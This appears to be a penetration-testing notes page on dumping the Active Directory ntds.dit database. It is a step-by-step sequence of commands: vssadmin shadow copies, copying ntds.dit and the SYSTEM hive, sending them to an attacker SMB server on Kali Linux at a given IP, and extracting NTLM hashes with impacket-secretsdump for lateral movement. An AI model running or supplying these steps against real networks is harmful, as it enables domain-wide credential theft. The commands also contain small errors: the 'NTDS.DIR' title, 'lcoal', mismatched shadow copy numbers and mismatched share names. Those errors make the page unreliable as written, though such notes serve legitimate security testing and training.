NTDS.DIR Active Directory

the ntds.dit file is the Active Directory (AD) database that stores information about domain objects, including user accounts, passwords (in NTLM hash format) , groups and group membership. Extracting and cracking the NTDS.DIT file allows you to obtain domain credentials, which can be used for lateral movement and privilege escalation

NTDS.DIT file location

%SystemRoot%\NTDS\ntds.dit

OR

C:\Windows\NTDS\ntds.dit

Step 1: Create a Volume Shadow Copy

  1. List existing shadow copies

vssadmin List Shadows

  1. Delete the oldest shadow copy(if needed)

vssadmin Delete Shadows /For=C:\oldest

  1. Create a new shadow copy

vssadmin create shadow /for=C:

Step 2: Copy the NTDS.DIT and SYSTEM Files

mkdir ntds
copy \\?\GLOBALROOT\Device\HardDiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds\ntds.dit
copy \\?\GLOBALROOT\Device\HardDiskVolumeShadowCopy1\windows\system32\config\system c:\ntds\system

Alternatively, save the SYSTEM registry hive directly

reg save hklm\system c:\ntds\system

Step 3: Transfer Files to Kali Linux

  1. Start the SMB Server

impacket-smbserver -smb2support -user user -password 12345 share /opt/share

  1. Copy files to the SMB server

copy ntds.dit \\192.168.29.218\Public\

Step 4: Extract Password Hashes from NTDS.DIT

impacket-secretsdump -system system -ntds ntds.dit lcoal
impacket-secretsdump -system system -ntds ntds.dit -hashes lmhashes:nthash -outfile ntlm-extract local
PreviousSAM and SYSTEM filesNextFileZilla Server Password Recovery

Last updated